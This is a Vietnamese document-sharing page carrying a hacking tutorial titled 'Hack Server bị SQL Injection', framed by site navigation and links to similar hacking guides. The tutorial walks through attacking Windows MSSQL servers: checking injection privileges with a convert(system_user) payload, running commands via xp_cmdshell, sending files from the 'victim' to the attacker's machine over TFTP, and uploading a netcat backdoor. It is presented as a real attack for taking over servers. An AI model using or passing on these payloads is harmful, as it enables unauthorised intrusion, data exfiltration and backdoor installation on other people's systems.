Kinh doanh - Marketing
Kinh tế quản lý
Biểu mẫu - Văn bản
Tài chính - Ngân hàng
Công nghệ thông tin
Tiếng anh ngoại ngữ
Kĩ thuật công nghệ
Khoa học tự nhiên
Khoa học xã hội
Văn hóa nghệ thuật
Sức khỏe - Y tế
Văn bản luật
Nông Lâm Ngư
Kỹ năng mềm
Luận văn - Báo cáo
Giải trí - Thư giãn
Tài liệu phổ thông
Văn mẫu
Giới thiệu
Đăng ký
Đăng nhập
Tìm
Danh mục
Kinh doanh - Marketing
Kinh tế quản lý
Biểu mẫu - Văn bản
Tài chính - Ngân hàng
Công nghệ thông tin
Tiếng anh ngoại ngữ
Kĩ thuật công nghệ
Khoa học tự nhiên
Khoa học xã hội
Văn hóa nghệ thuật
Y tế sức khỏe
Văn bản luật
Nông lâm ngư
Kĩ năng mềm
Luận văn - Báo cáo
Giải trí - Thư giãn
Tài liệu phổ thông
Văn mẫu
Thông tin
Điều khoản sử dụng
Quy định bảo mật
Quy chế hoạt động
Chính sách bản quyền
Giới thiệu
Đăng ký
Đăng nhập
0
Trang chủ
Công Nghệ Thông Tin
An ninh - Bảo mật
Hack Server bị SQL Injection
Đang chuẩn bị liên kết để tải về tài liệu:
Hack Server bị SQL Injection
Nhật Hùng
53
2
doc
Đang chuẩn bị nút TẢI XUỐNG, xin hãy chờ
Tải xuống
Để check bạn có thể làm sau đây trên inject link [injection link]’ %2b convert (int,(system_user())— Nếu KQ là ‘sa’ hoặc ‘dbo’ có lẽ bạn có thể tấn công được rồi. Nếu bạn có ‘sa’ hoặc ‘dbo’ nhưng mà admin lại không cho sử dụng cmdshell bạn hãy bật nó lên (bật thế nào tự tìm hiểu nhé ) | Hack Server bị SQL Injection trang này đã được đọc lần 1)Tỷ lệ thành công 80%: Điều kiện server phải là winnt và user dùng để inject là user có quyền dùng xp_cmdshell (sa, dbo) Để check bạn có thể làm sau đây trên inject link [injection link]’ %2b convert (int,(system_user())— Nếu KQ là ‘sa’ hoặc ‘dbo’ có lẽ bạn có thể tấn công được rồi. Nếu bạn có ‘sa’ hoặc ‘dbo’ nhưng mà admin lại không cho sử dụng cmdshell bạn hãy bật nó lên (bật thế nào tự tìm hiểu nhé ) Lưu ý : bạn sẽ chỉ hack được vào server chứa database của nó thôi (nhiều khi đặt database chung với host J ) Các tool cần thiết : client . Nó hoạt động tương tự như FTP nhưng đơn giản hơn nhiều , thông qua port 69, và một ưu điểm, nó không cần password (đây là điều quan trọng để ta hack) Vào DOS gõ tftp /? -> Bạn sẽ được cú pháp của nó như sau : TFTP [-i] host PUT || GET filename [vị trí file muốn gửi đến] -i : nếu bạn cần truyền một file dạng binary hãy sử dụng nó host : IP của máy server PUT : nếu bạn muốn send file GET : nếu bạn muốn lấy file Ví dụ về một lệnh tftp : Tftp –i xxx.xxx.xxx.xxx PUT netcat.exe C:nc.exe Sẽ lấy file netcat.exe trên máy server (máy có IP xxx .) và chuyển vào C:nc.exe trên máy client (máy đã gõ lệnh trên) Bây giờ ta sẽ test trực tiếp trên localhost. bạn hãy mỡ tftpd32 lên để biến máy mình thành một server tftp (lưu ý phải tắt hết firewall giao thức mới thực hiện tốt) Trong tftpd32 có phần BASE directory mặc định là [path to]tftpd32e, nó sẽ là thư mục đặt các file up hoặc download của bạn khi thực hiện trao đổi file với client (vì bạn là server) (bạn có thể change nếu thích). Trong bài này tôi dùng [link] thay cho link các bạn inject, hãy chỉnh lại cho phù hợp để run exec (thêm (‘), ( nếu cần ) Và dùng để thay cho Ip của các bạn (nó sẽ hiển thị khi các bạn bật tftpd32) +Tấn công thực sự: ------------BEGIN-------------- Command1 : RUN COMMAND DOS trên máy victim : [link] exec masterxp_cmdshell ‘[command]’ Command 2 : DOWNLOAD FILE từ máy victim [link] exec masterxp_cmdshell ‘tftp PUT [path][filecandown]’ Ví dụ : Lấy Ip máy victim : (1)[link] exec masterxp_cmdshell ‘ipconfig > a.txt’ (2)[link] exec masterxp_cmdshell ‘tftp PUT a.txt’ ----Giải thích : (1) : run lệnh này : ipconfig >a.txt tạo file a.txt với nội dung là kết quả của lệnh ipconfig (2) : run tftp PUT a.txt chuyển file a.txt với nội dung vừa tạo --> server (máy chúng ta ) Command3 : UPLOAD BACKDOOR lên máy victim : [link] exec masterxp_cmdshell ‘tftp [–i] GET backdoor [path muon backdoor được đặt]’ ví dụ : upload netcat vào C:WINNT: [link] exec masterxp_cmdshell ‘tftp –i GET nc.exe C:WINNTnx.exe’ ---------------END--------------- 3) Kết: Như vậy chúng ta đã biết cách run command (bạn có thể run file exe ) , biết down, up file, hầu như đã làm chủ được server rồi đấy . Còn hack nhanh hay chậm, hiệu quả bao nhiêu là do bạn
TÀI LIỆU LIÊN QUAN
Hack Apache server
Hack Microsoft FrontPage Server Extensions Remote Debug Buffer Overrun Vulnerability
Hack IIS Server
Hack IIS server bằng UNICODE bug
Hack shop qua lỗi SQL server injection
Hack Server bị SQL Injection
Các bước để Hack Server
Hack server thông qua khai thác lỗ hổng của Unicode trong Microsoft IIS
Code làm tê liệt các máy chủ dùng MSSQL Server
Tấn Công Ms Sql Server, (cách cổ điển)
crossorigin="anonymous">
Đã phát hiện trình chặn quảng cáo AdBlock
Trang web này phụ thuộc vào doanh thu từ số lần hiển thị quảng cáo để tồn tại. Vui lòng tắt trình chặn quảng cáo của bạn hoặc tạm dừng tính năng chặn quảng cáo cho trang web này.